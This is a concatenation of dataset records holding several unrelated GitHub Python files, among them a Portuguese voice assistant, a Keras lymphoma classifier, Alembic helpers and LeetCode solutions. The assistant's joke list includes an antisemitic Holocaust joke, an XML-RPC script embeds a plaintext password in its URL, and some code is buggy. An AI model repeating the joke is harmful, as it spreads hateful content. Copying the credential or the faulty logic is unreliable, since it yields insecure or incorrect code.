os.path.splitext(filename)\r\n for key, value in label_conversion.items():\r\n if base.endswith(value):\r\n random_list = random.sample(range(10, 99), 7)\r\n file_name = '-'.join([str(i) for i in random_list])\r\n file_name_with_correct_emotion = (file_name[:6] + key + file_name[8:] + extension).strip()\r\n shutil.move(filename, file_name_with_correct_emotion)\r\n\r\n else:\r\n base, extension = os.path.splitext(filename)\r\n for key, value in label_conversion.items():\r\n if base.endswith(value):\r\n random_list = random.sample(range(10, 99), 7)\r\n file_name = '-'.join([str(i) for i in random_list])\r\n file_name_with_correct_emotion = (file_name[:6] + key + file_name[8:] + extension).strip()\r\n shutil.move(filename, file_name_with_correct_emotion)\r\n\r\n\r\n","repo_name":"hrishi09/SED_Model","sub_path":"Dataset samples/change_tess_files_name.py","file_name":"change_tess_files_name.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19418091767","text":"import os\r\nimport datetime as dt\r\nimport wikipedia as wik\r\nimport speech_recognition as sr\r\nimport pyautogui as pg\r\nimport random\r\n# Arquivo reservado para criação de funçõe para a IA LIA\r\n# Desenvolvido por Matheus\r\n\r\n# Executar algum outro arquivo\r\n\r\n\r\ndef executar_arquivo(maquina, nome):\r\n maquina.say('Qual deseja executar? 
')\r\n maquina.runAndWait()\r\n audio1 = 'Tem certeza que escreveu corretamente?'\r\n audio2 = 'Arquivo inexistente no diretório de execução de scripts'\r\n audio3 = ('Esse arquivo não consta no meu banco de dados')\r\n audios = [audio1, audio2, audio3]\r\n pause = True\r\n while pause == True:\r\n caminho = input('Digite o nome do arquivo: ')\r\n arquivo = (\r\n 'C:\\Python_Projects\\Programas_por_Math_Gama\\IA LIA\\ScriptsDeExecucao/'+caminho)\r\n if caminho == 'sair':\r\n maquina.say('Voltando a página principal')\r\n maquina.runAndWait()\r\n pause = False\r\n elif not os.path.exists(arquivo):\r\n maquina.say(random.choice(audios))\r\n maquina.runAndWait()\r\n else:\r\n maquina.say('Executando o arquivo '+caminho)\r\n maquina.runAndWait()\r\n os.startfile(arquivo)\r\n\r\n pause = False\r\n\r\n# Dizer as horas\r\n\r\n\r\ndef saber_horas(maquina, nome):\r\n hora2 = dt.datetime.now().strftime('%H:%M')\r\n hora = dt.datetime.now().strftime('%H%M')\r\n teste = int(hora)\r\n if teste <= 1159:\r\n maquina.say('Bom dia ' + nome +\r\n ', agora são exatamente' + hora2+' da manhã')\r\n maquina.runAndWait()\r\n elif (teste >= 1200) & (teste <= 1800):\r\n maquina.say('Boa tarde ' + nome +\r\n ', agora são exatamente' + hora2+' da tarde')\r\n maquina.runAndWait()\r\n elif (teste >= 1900) & (teste <= 100):\r\n maquina.say('Boa noite ' + nome +\r\n ', agora são exatamente' + hora2 + ' da noite')\r\n maquina.runAndWait()\r\n\r\n# Pesquisar algo na wikipedia\r\n\r\n\r\ndef func_search(maquina, nome):\r\n maquina.say('Sobre quem \\n ou oque deseja que eu procure?')\r\n maquina.runAndWait()\r\n pesquisa = input('Digite sobre oque deseja pesquisar: ')\r\n if (pesquisa == 'exit') | (pesquisa == 'sair'):\r\n maquina.say('Saindo do sistema \\n até mais ' + nome.read())\r\n maquina.runAndWait()\r\n else:\r\n wik.set_lang('pt')\r\n resultado = wik.summary(pesquisa, 2)\r\n print(resultado)\r\n maquina.say(resultado)\r\n maquina.runAndWait()\r\n\r\n# Comando de voz\r\n\r\n\r\ndef comando_voz(maquina, nome):\r\n maquina.say('Comando de voz ativado')\r\n maquina.runAndWait()\r\n audio = sr.Recognizer()\r\n try:\r\n with sr.Microphone() as source:\r\n maquina.say('O microfone está OK')\r\n maquina.runAndWait()\r\n print('Ouvindo...')\r\n voz = audio.listen(source)\r\n comando = audio.recognize_google(voz, 'pt-BR')\r\n comando = comando.lower()\r\n\r\n if 'executa um arquivo' in comando:\r\n executar_arquivo(maquina, nome)\r\n\r\n elif 'que horas' in comando:\r\n maquina.say('horas')\r\n # saber_horas(maquina, nome)\r\n\r\n elif 'conta uma piada' in comando:\r\n contar_piada(maquina)\r\n\r\n elif 'sair' in comando:\r\n maquina.say('Saindo do sistema, até mais '+nome)\r\n maquina.runAndWait()\r\n except:\r\n print('microfone não esta ok')\r\n\r\n# Contar uma piada aleatória\r\n\r\n\r\ndef contar_piada(maquina):\r\n piada01 = 'Como juntar duas motos? 
\\nPega as duas e Yamaha.'\r\n piada02 = 'Por que o homem invisível recusou uma oferta de emprego?\\nPorque ele não se via trabalhando com aquilo'\r\n piada03 = 'Como transformar um giz em uma cobra?\\nÉ só colocar na água que o giz bóia'\r\n piada04 = 'O que pediu o astronauta claustrofóbico?\\nUm pouco de espaço'\r\n piada05 = 'Por que um fantasma entrou no elevador?\\nPara elevar o espírito.'\r\n piada06 = 'Qual a diferença entre uma pizza e um judeu?\\nA pizza não grita no fogo\\nEssa foi pesada até mesmo pro Pericles\\nTa lôuco fiquei até triste'\r\n piada07 = 'Ana e César foram à maternidade para o nascimento do filho\\nO bebê nasceu de cesareana'\r\n piada08 = 'Quer ouvir duas piadas curtas e uma piada longa?\\nPiada, piada, piaaaaaaaaaaaaaada'\r\n piada09 = 'Um homem sentou em cima de um cachorro. Qual é o nome do filme?\\nSento em um dálmata'\r\n piada10 = 'Um rapaz viu o Thor de perto. Qual o nome dele?\\nVi-thor'\r\n audios = ['Se liga nessa piada', 'Essa vai ser engraçada se liga',\r\n 'Mano, essa aqui eu ri pakas', 'Olha essa']\r\n piadas = [piada01, piada02, piada03, piada04, piada05,\r\n piada06, piada07, piada08, piada09, piada10]\r\n maquina.say(random.choice(audios))\r\n maquina.say(random.choice(piadas))\r\n maquina.runAndWait()\r\n","repo_name":"mth-gama/Assistent_Lia","sub_path":"Funcoes_LIA.py","file_name":"Funcoes_LIA.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29154076126","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef BuildProbas(Size=100, a=1, b=1):\n Probs = [0 for i in xrange(Size)]\n for i in xrange(Size):\n for j in xrange(Size):\n Probs[i]+=float(abs(i-j)**a)/float((i+j+2)**b)\n Probs = np.array(Probs)\n Probs/=Probs.sum()\n return Probs\n \n\ndef PlotProbs(Probs, Plotlabel = \"\"):\n CumProbs = Probs\n Xvalues= [float(i+1)/len(CumProbs)*100 for i in xrange(len(CumProbs))]\n CumProbs *= float(len(CumProbs))/100.0\n plt.plot(Xvalues,CumProbs, label = Plotlabel)\n return\n\ndef FindMin(Probs):\n return Probs.argmin()+1\n","repo_name":"JanFialkowski/Rankingnetwork","sub_path":"NodeProbs.py","file_name":"NodeProbs.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22628612193","text":"\nclass eng_agnt(UVMAgent):\n\n # // constructor\n def __init__(self, name, parent):\n UVMAgent.__init__(self, name, parent)\n self.driver = None\n self.sequencer = None\n self.monitor = None\n self.tag = \"eng_agnt_\" + name\n\n # // build_phase\n def build_phase(self, phase):\n UVMAgent.build_phase(self, phase)\n self.monitor = ubus_slave_monitor.type_id.create(\"u_slv_monitor\", self)\n if self.get_is_active() == UVM_ACTIVE:\n self.driver = ubus_slave_driver.type_id.create(\"u_slv_driver\", self)\n self.sequencer = ubus_slave_sequencer.type_id.create(\"u_slv_sequencer\", self)\n\n # connect_phase\n def connect_phase(self, phase):\n if self.get_is_active() == UVM_ACTIVE:\n uvm_info(self.tag, \"Connecting comps in active mode now\",\n UVM_MEDIUM)\n self.driver.seq_item_port.connect(self.sequencer.seq_item_export)\n 
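            # (Added commentary, hedged: this describes the general UVM
            # convention, not anything documented in this repo.) The line
            # above wires the standard pull path, where the driver's
            # seq_item_port requests transactions from the sequencer's
            # seq_item_export. The analysis hookup below is what makes this
            # a reactive slave agent: the monitor forwards observed
            # address-phase items to the sequencer so slave response
            # sequences can key off live bus traffic.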
self.sequencer.addr_ph_port.connect(self.monitor.addr_ph_imp)\n\n\nuvm_component_utils(eng_agnt)\n","repo_name":"Mohsannaeem/mohsan_hw","sub_path":"verif/adder/uvm_tb/agent/eng_agnt.py","file_name":"eng_agnt.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72685468328","text":"class Solution(object):\n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n pos=-1\n for i in range(len(nums)-1,0,-1):\n if nums[i-1] < nums[i]:\n pos=i-1\n break\n if pos == -1:\n nums.reverse()\n return\n else:\n for j in range(len(nums)-1,pos,-1):\n if nums[j] > nums[pos]:\n nums[pos],nums[j]=nums[j],nums[pos]\n break\n nums[pos+1:]=nums[pos+1:][::-1]\n return","repo_name":"zazaliu/leetcode-python","sub_path":"array/31. Next Permutation.py","file_name":"31. Next Permutation.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33286601969","text":"\n# --------------------------------------------------------------------------------------------------\n\n# Libraries\nimport os\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport pickle\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport seaborn as sns\nimport random as rd\nimport keras\n\nfrom numpy.random import seed\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import minmax_scale\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nfrom keras.layers import Input, add\nfrom keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape\nfrom keras import regularizers\nfrom keras.regularizers import l2\nfrom keras.utils import np_utils\nfrom keras.models import Model, load_model\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom scipy import stats\nfrom pylab import rcParams\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\n\n# --------------------------------------------------------------------------------------------------\n\n# Read data\ndata = pd.read_csv('dlbcl_preprocessed.txt', sep=\" \", header=None)\n\nprint(data.shape)\n\ndata_t = data.T\n\n# create header var\nheader = data_t.iloc[0]\n\n# Replace the dataframe with a new one which does not contain the first row\ndata_t = data_t[1:]\n# Rename the dataframe's column values with the header variable\ndata_t.rename(columns = header)\n\n# --------------------------------------------------------------------------------------------------\n\n# Cleaning Dataset\n\n# replace\ndata.y.replace((0, 1), ('normal', 'tumor'), inplace=True)\n\n# data rearrange\nY = data_t.iloc[:,2647] #58-19\nX = data_t.iloc[:,0:2646]\n\nX.shape, Y.shape\n\n# --------------------------------------------------------------------------------------------------\n\n# Principal Component Analysis\n\nfrom sklearn.preprocessing import StandardScaler\n# Standardizing the features\nX = StandardScaler().fit_transform(X)\n\npca = PCA(n_components = 77)\nX_r = 
pca.fit(X.T)\n\nprint(pca.explained_variance_ratio_[1:30])\npca.components_.shape\n\nper_var = np.round(pca.explained_variance_ratio_* 100, decimals=1)\nlabels = ['PC' + str(x) for x in range(1, len(per_var)+1)]\n\n# plot of percentage of explained variance\nplt.bar(x=range(1,len(per_var)+1), height=per_var, tick_label=labels)\nplt.axvline(x=41, color='g', linestyle ='dashed',linewidth=1)\nplt.ylabel('Percentage of Explained Variance')\nplt.xlabel('Principal Component')\nplt.title('Scree Plot')\nplt.show()\n\ncumsum_ = np.cumsum(pca.explained_variance_ratio_)\nr = range(0,77)\n\n# how many features for the 90% percentile\nplt.plot(r,cumsum_)\nplt.axvline(x=41, color='g', linestyle ='dashed',linewidth=1)\nplt.axhline(y=0.9, color='g', linestyle ='dashed',linewidth=1)\n\n# Determine which genes had the biggest influence on PC1\n\n# get the name of the top 10 measurements (genes) that contribute\n# most to pc1.\n# first, get the loading scores\nloading_scores = pd.Series(pca.components_[0])\n# now sort the loading scores based on their magnitude\nsorted_loading_scores = loading_scores.abs().sort_values(ascending=False)\n\n# get the names of the top 10 genes\ntop_10_genes = sorted_loading_scores[0:10].index.values\n\n# print the gene names and their scores (and +/- sign)\nprint(loading_scores[top_10_genes], '\\n', header[[12,7,28,15,20,8,41,1,17,91]])\n\n\n# PCA Classification with Neural Network\n\n# NNet for classifier w\\ softmax\nseed = 23\nnp.random.seed(seed)\n\n# encode class values as integers\nencoder = LabelEncoder()\nencoder.fit(Y)\nencoded_Y = encoder.transform(Y)\n\ndef create_baseline():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(77, input_dim=77, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\n\n# 1 evaluate model with standardized dataset\nestimator = KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(estimator, pca.components_, encoded_Y, cv=kfold)\nprint(\"Results: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Results: 69.05% (9.86%)\n\n# 2 larger model\ndef create_larger():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(77, input_dim=77, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(35, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_larger, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, pca.components_, encoded_Y, cv=kfold)\nprint(\"Larger: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Larger: 71.73% (10.34%)\n\n# 3 smaller model\ndef create_smaller():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(35, input_dim=77, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', 
optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_smaller, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, pca.components_, encoded_Y, cv=kfold)\nprint(\"Smaller: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Smaller: 72.98% (5.95%)\n\n\n# --------------------------------------------------------------------------------------------------\n\n# Sparse Autoencoder\n\nY = data_t.iloc[:,2647]\n\nn = int(data_t.shape[1]*0.1)\ns = np.random.randint(1,2646, n)\n\ndf_ = pd.DataFrame(data_, index=list(range(0, 77))) #77x77\ndf_raw = pd.DataFrame(data_t.iloc[:,s], index=list(range(1,77))) #76x264\n\nX = pd.concat([df_.iloc[1:77,0:76], df_raw], axis=1, join_axes=[df_.iloc[1:102,0:101].index]) #76x340\n\nXs = minmax_scale(X, axis = 0)\nncol = Xs.shape[1]\n\nXs.shape,ncol\n\n# TRAIN e TEST\nS_X_train, S_X_test, S_Y_train, S_Y_test = train_test_split(Xs, Y[1:77], test_size = 0.4)\nS_X_test.shape, S_X_train.shape\n\n#------------------\n#Sparse Autoencoder\n#------------------\n# from keras import optimizers\n# # All parameter gradients will be clipped to a maximum norm of 1.\nsgd = optimizers.SGD(lr=0.01, clipvalue=0.5)\n\ninput_dim = Input(shape = (ncol, ))\nencoding_dim = 75\nencoded = Dense(encoding_dim, activation = 'sigmoid',activity_regularizer=regularizers.l1(10e-5))(input_dim)\ndecoded = Dense(ncol, activation = 'sigmoid')(encoded)\nautoencoder = Model(inputs = input_dim, outputs = decoded)\nautoencoder.compile(optimizer = 'adam', loss = 'mse')\nhistory = autoencoder.fit(S_X_train, S_X_train, epochs = 1000, batch_size = 15, shuffle = True, validation_data = (S_X_test, S_X_test), verbose=0)\n\n# THE ENCODER TO EXTRACT THE REDUCED DIMENSION FROM THE ABOVE AUTOENCODER\nencoder = Model(inputs = input_dim, outputs = encoded)\nencoded_input = Input(shape = (encoding_dim, ))\nencoded_out = encoder.predict(S_X_test)\nencoded_out2 = encoder.predict(S_X_train)\nresult = encoder.predict(Xs)\n\n#print shape\nencoded_out.shape, encoded_out2.shape\n\n# Plot all losses\nprint(history.history.keys())\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper right')\nplt.show()\n\n\n# Classification\n\n# NNet for classifier w\\ softmax\nseed = 23\nnp.random.seed(seed)\n\nS_Y = Y.iloc[1:77]\n\n# encode class values as integers\nencoder = LabelEncoder()\nencoder.fit(S_Y)\nencoded_Y = encoder.transform(S_Y)\n\ndef create_baseline():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(75, input_dim=75, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\n\n# 1 evaluate model with standardized dataset\nestimator = KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(estimator, result, encoded_Y, cv=kfold)\nprint(\"Results: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Results: 90.00% (9.35%)\n\n# 2 larger model\ndef create_larger():\n\t# create model\n\tmodel = 
Sequential()\n\tmodel.add(Dense(75, input_dim=75, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(35, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_larger, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, result, encoded_Y, cv=kfold)\nprint(\"Larger: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Larger: 92.50% (8.29%)\n\n# 3 smaller model\ndef create_smaller():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(35, input_dim=75, kernel_initializer='normal', activation='softmax'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_smaller, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, result, encoded_Y, cv=kfold)\nprint(\"Smaller: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Smaller: 85.65% (10.39%)\n","repo_name":"AlessioPeluso/Lymphoma-classification-","sub_path":"Lymphoma_AutoEncoder.py","file_name":"Lymphoma_AutoEncoder.py","file_ext":"py","file_size_in_byte":10757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1136367611","text":"#!/usr/bin/env python\nimport xmlrpclib,pprint\nserver = xmlrpclib.Server('http://adam:fred123@localhost/zidestore/so/adam/')\nstatus = { }\n#status['comment'] = 'This is my very pretty comment.'\nstatus['objectId'] = 10700730\n#status['rsvp'] = 0\n#status['status'] = 'ACCEPTED'\nstatus['entityName'] = 'ParticipantStatus'\npprint.pprint(server.zogi.putObject(status))\n\n","repo_name":"BGCX261/zogi-svn-to-git","sub_path":"trunk/TestScripts/participantStatus.py","file_name":"participantStatus.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26026031145","text":"from __future__ import annotations\nimport typing as t\n\nfrom alembic.operations import Operations, MigrateOperation\nfrom sqlalchemy_utils.view import CreateView, DropView\n\nif t.TYPE_CHECKING:\n from sqlalchemy import Select\n\n\n@Operations.register_operation('create_view')\nclass CreateViewOp(MigrateOperation):\n \"\"\"Create a VIEW.\"\"\"\n\n def __init__(\n self,\n view_name: str,\n selectable: Select[t.Any],\n materialized: bool = False,\n schema: t.Optional[str] = None,\n ) -> None:\n self.view_name = view_name\n self.selectable = selectable\n self.materialized = materialized\n self.schema = schema\n\n @classmethod\n def create_view(\n cls,\n operations: Operations,\n view_name: str,\n selectable: Select[t.Any],\n materialized: bool = False,\n **kw: t.Any,\n ) -> None:\n \"\"\"Issue a \"CREATE VIEW\" instruction.\"\"\"\n op = cls(view_name, selectable, materialized, **kw)\n operations.invoke(op)\n\n def 
reverse(self) -> DropViewOp:\n # only needed to support autogenerate\n return DropViewOp(self.view_name, schema=self.schema)\n\n\n@Operations.register_operation('drop_view')\nclass DropViewOp(MigrateOperation):\n \"\"\"Drop a VIEW.\"\"\"\n\n def __init__(\n self,\n view_name: str,\n materialized: bool = False,\n cascade: bool = True,\n schema: t.Optional[str] = None,\n ) -> None:\n self.view_name = view_name\n self.materialized = materialized\n self.cascade = cascade\n self.schema = schema\n\n @classmethod\n def drop_view(\n cls,\n operations: Operations,\n view_name: str,\n materialized: bool = False,\n cascade: bool = True,\n **kw: t.Any,\n ) -> None:\n \"\"\"Issue a \"DROP VIEW\" instruction.\"\"\"\n op = cls(view_name, materialized, cascade, **kw)\n operations.invoke(op)\n\n\n@Operations.implementation_for(CreateViewOp)\ndef create_view(operations: Operations, operation: CreateViewOp) -> None:\n if operation.schema is not None:\n name = '%s.%s' % (operation.schema, operation.view_name)\n else:\n name = operation.view_name\n operations.execute(CreateView(name, operation.selectable))\n\n\n@Operations.implementation_for(DropViewOp)\ndef drop_view(operations: Operations, operation: DropViewOp) -> None:\n if operation.schema is not None:\n name = '%s.%s' % (operation.schema, operation.view_name)\n else:\n name = operation.view_name\n operations.execute(DropView(name))\n","repo_name":"kyzima-spb/flask-useful","sub_path":"src/flask_useful/alembic.py","file_name":"alembic.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24985442307","text":"# chat/consumers.py\nimport json\nfrom channels.generic.websocket import WebsocketConsumer\nfrom asgiref.sync import async_to_sync\nfrom .models import ChatMessage\n\n\nclass ChatConsumer(WebsocketConsumer):\n \n def connect(self):\n\n self.room_group_name = 'test'\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n print(\"SE HA CONECTADO AL CHATBOT\")\n print(f\"Canal agregado al grupo. 
Nombre del canal: {self.channel_name}\")\n\n self.accept()\n\n def disconnect(self, close_code):\n print(\"SE HA DESCONECTADO\")\n pass\n\n def receive(self, text_data):\n \n text_data_json = json.loads(text_data)\n message = text_data_json[\"message\"]\n\n #self.send(text_data=json.dumps({\"message\": message}))\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type':'chat_message',\n 'message': message\n }\n )\n print(\"SE HA RECIBIDO\")\n \n def chat_message(self,event):\n try:\n session_id = self.scope.get('session').session_key\n message = event['message']\n self.send(text_data = json.dumps(\n {\n 'type':'chat',\n 'message':message\n }\n ))\n\n print('Se ha llamado : CHATBOT_MESSAGE')\n print('Sesion ID: '+session_id)\n message = event['message']\n except TypeError:\n print(\"error en chat_message\")\n\n # Guardar el mensaje en la base de datos\n if message !='':\n ChatMessage.objects.create(message=message)\n print('Mensaje guardado en el consumer')\n ","repo_name":"Fckworld/channels","sub_path":"mysite/chatbot/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38359188872","text":"import sys\nsys.path.insert(0, '../')\n\nfrom tms.base import Configuration\nfrom oauthlib.oauth2 import LegacyApplicationClient\nfrom requests_oauthlib import OAuth2Session\nimport requests\nimport json\nimport ast\n\nclass SetUp(Configuration):\n \"\"\"\n This class supports setting up the client before requesting data from the TMS REST API. This includes acquiring a\n token to assist with OAuth2 authentication and creating the header which is necessary to be used for any REST API\n request.\n \"\"\"\n\n def __init__(self):\n Configuration.__init__(self)\n\n self.token_url = self.get_configuration_for('service', 'token_url')\n self.username = self.get_configuration_for('service', 'username')\n self.password = self.get_configuration_for('service', 'password')\n self.client_id = self.get_configuration_for('service', 'client_id')\n self.client_secret = self.get_configuration_for('service', 'client_secret')\n self.scope = ast.literal_eval(self.get_configuration_for('service', 'scope'))\n self.api_url = self.get_configuration_for('service', 'api_url')\n\n def get_token(self):\n \"\"\"(None) -> str\n This REST API is using OAuth2 for authentication. Multiple OAuth2 authentication flows are supported. The quickest\n flow supported is the \"Resource Owner Password Credentials Grant flow\". To authentication using OAuth2 in Python\n this method is using the modules \"oauthlib\" and \"requests_oauthlib\" which need to be installed prior using this\n method. 
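        (Added illustration, hedged: the field names below follow RFC 6749
        generally and are not copied from this specific service.) Under the
        hood the grant is a single POST to the token endpoint, roughly:
            POST <token_url>
            grant_type=password&username=...&password=...
            &client_id=...&client_secret=...&scope=...
        and the bearer token comes back as "access_token" in the JSON body.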
In order to authenticate with this oauth2 flow you need the following information:\n Resource Owner Name, Resource Owner Password, Client Identification, Client Secret, Access Token URI, and Scope.\n >>>get_token()\n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n \"\"\"\n\n self.oauth = OAuth2Session(client=LegacyApplicationClient(client_id=self.client_id))\n self.data = self.oauth.fetch_token(\n token_url=self.token_url,\n username=self.username,\n password=self.password,\n client_id=self.client_id,\n client_secret=self.client_secret)\n\n self.token = str(self.data[u'access_token'])\n return self.token\n\n def create_header(self):\n \"\"\"(None) -> dict\n Returns a dictionary which includes the data needed for making a request to the TMS REST API using requests.\n In the example provided below the 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' represents the token.\n >>>create_header()\n {'Authorization': 'Bearer xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'}\n \"\"\"\n\n self.header = {'Authorization': 'Bearer %s' % (self.token)}\n return self.header\n\n\nclass RestRequests(Configuration):\n\n def __init__(self, token, headers):\n\n Configuration.__init__(self)\n self.headers = headers\n self.token = token\n\n def get(self, url):\n r = requests.get(url, headers=self.headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return r.status_code\n","repo_name":"Improvement-Service/TMS_API_Usage_Example","sub_path":"tms/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27508686513","text":"import ast\r\n\r\ndef get_stud():#學號\r\n txt=\"1b\"\r\n data = open(txt).read().split(\"\\n\")\r\n stud = data[:-1]\r\n return stud\r\ncp_stud = get_stud()\r\n \r\ncp_w11_quiz_=\"1btest.json\"\r\n\r\ndef get_score(json):#考試結果\r\n person = 0\r\n score = 0\r\n json_data = open(json).read()\r\n big_dict = ast.literal_eval(json_data)\r\n testuser = big_dict[\"body\"][\"testuser\"]\r\n quiz_dict = {}\r\n for i in testuser:\r\n stud_id = testuser[i][\"user_name\"]\r\n stud_score = int(float( testuser[i][\"total_score\"]))\r\n quiz_dict[stud_id] = stud_score\r\n person = person + 1\r\n score = score + stud_score\r\n return quiz_dict, person, score\r\n \r\n#cp_quiz, num_stud, total_score = get_score(cp_w10_quiz_url)\r\ncp_quiz, person, score = get_score(cp_w11_quiz_)\r\ncp_abs = []\r\nfor stud in cp_stud:\r\n try:\r\n print(stud, cp_quiz[stud])\r\n except:\r\n # 缺考者沒有 quiz 成績\r\n print(stud, \"缺\")\r\n cp_abs.append(stud)\r\nprint (\"\\n參考人數%s\"%(person))\r\nprint (\"\\n以下為總分%s\"%(score)) \r\nprint(\"\\n考試平均分數為:\", int(score/person))\r\n#列出缺考名單\r\nprint(\"=\"*20)\r\nprint(\"以下為 w11 缺考名單:\")\r\nfor stud in cp_abs:\r\n print(stud)","repo_name":"SnowNightOwO/Snow","sub_path":"HW10,11考試結果調查(功課)/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72134034729","text":"from typing import List\n\n\nclass Solution:\n def fullJustify(self, words: List[str], maxWidth: int) -> List[str]:\n ans = []\n now = 0\n sub_str = []\n number = 0\n for string in words:\n if now + len(string) + 1 <= maxWidth:\n now = now + len(string) + 1\n sub_str.append(string)\n number = number + 1\n elif now + len(string) == maxWidth:\n sub_ans = \"\"\n for index in sub_str:\n sub_ans += index + \" \"\n sub_ans += string\n ans.append(sub_ans)\n now = 0\n sub_str.clear()\n 
